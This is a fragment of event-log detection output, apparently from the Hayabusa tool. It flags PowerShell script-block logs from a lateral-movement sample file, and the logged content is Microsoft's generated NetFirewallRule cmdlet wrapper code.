'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' -Alias '*' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 